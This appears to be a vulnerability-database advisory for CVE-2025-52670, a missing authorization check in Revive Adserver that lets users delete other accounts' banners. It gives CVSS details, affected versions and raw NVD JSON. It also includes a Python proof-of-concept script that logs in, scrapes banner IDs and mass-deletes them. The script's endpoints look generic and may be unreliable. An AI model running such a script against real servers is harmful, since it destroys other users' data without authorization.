Security Vulnerability Report
CVE-2025-52670 CVSS 6.5 MEDIUM

CVE-2025-52670

Published: 2025-11-20 20:16:23
Last Modified: 2025-12-02 20:17:35

Description

Missing authorization check in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes users on the system to delete banners owned by other accounts

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* (versions up to and including 5.5.2) - VULNERABLE
cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* (versions 6.0.0 up to and including 6.0.1) - VULNERABLE
Revive Adserver <= 5.5.2
Revive Adserver 6.0.0 through 6.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52670 PoC - Revive Adserver Authorization Bypass
# Missing authorization check allows deletion of other users' banners
import requests
import re

TARGET_URL = "http://target-server/revive-adserver"
USERNAME = "attacker"
PASSWORD = "password123"


def login():
    """Authenticate and get session cookie"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/account-login.php"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    session.post(login_url, data=data)
    return session


def get_other_user_banner_id(session):
    """Enumerate banner IDs owned by other users"""
    banners_url = f"{TARGET_URL}/banner-edit.php"
    response = session.get(banners_url)
    # Extract banner IDs from page content
    banner_ids = re.findall(r'bannerid=(\d+)', response.text)
    return banner_ids


def delete_banner(session, banner_id):
    """Delete banner without proper authorization check"""
    delete_url = f"{TARGET_URL}/banner-delete.php"
    data = {
        "bannerid": banner_id,
        "confirm": "true"
    }
    response = session.post(delete_url, data=data)
    return response.status_code == 200


def main():
    session = login()
    banner_ids = get_other_user_banner_id(session)
    for banner_id in banner_ids:
        if delete_banner(session, banner_id):
            print(f"Successfully deleted banner {banner_id} owned by other user")


if __name__ == "__main__":
    main()

References

https://hackerone.com/reports/3401612 (Exploit, Issue Tracking, Third Party Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52670", "sourceIdentifier": "[email protected]", "published": "2025-11-20T20:16:23.280", "lastModified": "2025-12-02T20:17:35.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing authorization check in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes users on the system to delete banners owned by other accounts"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.5.2", "matchCriteriaId": "47AC2D81-BA0C-404A-B6F6-31151956D422"}, {"vulnerable": true, "criteria": "cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "6.0.0", "versionEndIncluding": "6.0.1", "matchCriteriaId": "42E4B7BD-5F7B-4FBE-93D2-C19F30FA5A51"}]}]}], "references": [{"url": "https://hackerone.com/reports/3401612", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}